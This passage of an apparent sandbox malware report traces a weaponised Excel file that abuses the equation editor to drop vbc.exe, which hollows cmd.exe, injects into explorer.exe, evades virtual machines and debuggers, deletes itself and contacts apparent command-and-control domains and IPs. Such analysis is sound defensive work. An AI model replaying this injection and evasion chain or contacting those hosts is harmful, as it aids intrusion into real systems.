Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234F9F0 NtClose,LdrInitializeThunk,	7_2_0234F9F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_0234FED0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FFB4 NtCreateSection,LdrInitializeThunk,	7_2_0234FFB4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FC60 NtMapViewOfSection,LdrInitializeThunk,	7_2_0234FC60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FD8C NtDelayExecution,LdrInitializeThunk,	7_2_0234FD8C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FDC0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_0234FDC0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02350078 NtResumeThread,	7_2_02350078
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02350060 NtQuerySection,	7_2_02350060
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02350048 NtProtectVirtualMemory,	7_2_02350048
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023510D0 NtOpenProcessToken,	7_2_023510D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0235010C NtOpenDirectoryObject,	7_2_0235010C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02351148 NtOpenThread,	7_2_02351148
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023501D4 NtSetValueKey,	7_2_023501D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FA20 NtQueryInformationFile,	7_2_0234FA20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FA50 NtEnumerateValueKey,	7_2_0234FA50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FAB8 NtQueryValueKey,	7_2_0234FAB8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FAD0 NtAllocateVirtualMemory,	7_2_0234FAD0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FBE8 NtQueryVirtualMemory,	7_2_0234FBE8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234F8CC NtWaitForSingleObject,	7_2_0234F8CC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02351930 NtSetContextThread,	7_2_02351930
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234F938 NtWriteFile,	7_2_0234F938
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FE24 NtWriteVirtualMemory,	7_2_0234FE24
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FEA0 NtReadVirtualMemory,	7_2_0234FEA0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FF34 NtQueueApcThread,	7_2_0234FF34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FFFC NtCreateProcessEx,	7_2_0234FFFC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FC30 NtOpenProcess,	7_2_0234FC30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02350C40 NtGetContextThread,	7_2_02350C40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FC48 NtSetInformationFile,	7_2_0234FC48
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FC90 NtUnmapViewOfSection,	7_2_0234FC90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FD5C NtEnumerateKey,	7_2_0234FD5C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02351D80 NtSuspendThread,	7_2_02351D80
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000985B0 NtCreateFile,	7_2_000985B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_00098660 NtReadFile,	7_2_00098660
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000986E0 NtClose,	7_2_000986E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000985AA NtCreateFile,	7_2_000985AA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000986DA NtClose,	7_2_000986DA

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_4A73A902: CreateFileW,DeviceIoControl,memcpy,CloseHandle,FindFirstStreamW,FindNextStreamW,FindClose,

7_2_4A73A902

Source: deo[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: deo[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: OCT 13 2021 - PRINT COPY.xlsx

ReversingLabs: Detection: 23%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$OCT 13 2021 - PRINT COPY.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRF833.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/13@6/6

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_4A743185 GetDiskFreeSpaceExW,

7_2_4A743185

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.539428502.00000000004AC000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, cmd.exe
Source:	Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.539476945.00000000004EA000.00000004.00000001.sdmp, cmd.exe
Source:	Binary string: cmd.pdb,$uJ6$uJ@$uJ source: vbc.exe, 00000005.00000003.539476945.00000000004EA000.00000004.00000001.sdmp, cmd.exe, 00000007.00000000.540165675.000000004A730000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: deo[1].exe.2.dr, MapEditor1/CreateMapDialog.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.2.dr, MapEditor1/CreateMapDialog.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.d60000.0.unpack, MapEditor1/CreateMapDialog.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.vbc.exe.d60000.2.unpack, MapEditor1/CreateMapDialog.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.d60000.0.unpack, MapEditor1/CreateMapDialog.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.2.vbc.exe.d60000.4.unpack, MapEditor1/CreateMapDialog.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00258B50 push esp; iretd	4_2_00258B56
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00254497 push cs; iretd	4_2_00254499
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00252C96 push esi; iretd	4_2_00252C97
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B85C push eax; ret	5_2_0041B862
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00407027 push ebx; ret	5_2_00407096
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00415115 push es; iretd	5_2_00415128
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00414F3A push ds; iretd	5_2_00414F3B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B7F2 push eax; ret	5_2_0041B7F8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B7FB push eax; ret	5_2_0041B862
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B7A5 push eax; ret	5_2_0041B7F8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A7313B6 push ecx; ret	7_2_4A7313C9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0235DFA1 push ecx; ret	7_2_0235DFB4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_00087027 push ebx; ret	7_2_00087096
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0009B85C push eax; ret	7_2_0009B862
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_00095115 push es; iretd	7_2_00095128
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_00094F3A push ds; iretd	7_2_00094F3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0009B7A5 push eax; ret	7_2_0009B7F8

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_4A74D539 LoadLibraryW,GetProcAddress,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,

7_2_4A74D539

Source: initial sample	Static PE information: section name: .text entropy: 7.77320879492
Source: initial sample	Static PE information: section name: .text entropy: 7.77320879492

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\deo[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 4.2.vbc.exe.21ee5b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2628, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2816	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2556	Thread sleep time: -38861s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1636	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088C0 rdtsc

5_2_004088C0

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A732E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	7_2_4A732E73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A736E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	7_2_4A736E47
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A750202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError,	7_2_4A750202
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A74BF0C FindFirstFileW,FindNextFileW,FindClose,	7_2_4A74BF0C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A73BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose,	7_2_4A73BBA4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A750492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose,	7_2_4A750492

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 38861			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.506683745.000000000457A000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.506449406.000000000449C000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.486562840.000000000456F000.00000004.00000001.sdmp	Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 00000006.00000000.506449406.000000000449C000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000000
Source: explorer.exe, 00000006.00000000.523158349.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.486667717.00000000045D6000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.506683745.000000000457A000.00000004.00000001.sdmp	Binary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_4A74D539 LoadLibraryW,GetProcAddress,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,

7_2_4A74D539

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_4A732E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,

7_2_4A732E73

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088C0 rdtsc

5_2_004088C0

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 5_2_008926F8 mov eax, dword ptr fs:[00000030h]		5_2_008926F8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023626F8 mov eax, dword ptr fs:[00000030h]		7_2_023626F8

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409B30 LdrLoadDll,

5_2_00409B30

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A7313A9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		7_2_4A7313A9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A737C63 SetUnhandledExceptionFilter,		7_2_4A737C63

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 108.170.14.102 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.dbe648.com
Source: C:\Windows\explorer.exe	Domain query: www.lacucinadesign.com
Source: C:\Windows\explorer.exe	Network Connect: 45.39.212.162 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.upinmyfeels.com
Source: C:\Windows\explorer.exe	Domain query: www.publicationsplace.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ahljsm.com

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 4A730000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread register set: target process: 1764	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000000.502247197.0000000000750000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.684820604.0000000000950000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.502247197.0000000000750000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.684820604.0000000000950000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.502247197.0000000000750000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.684820604.0000000000950000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

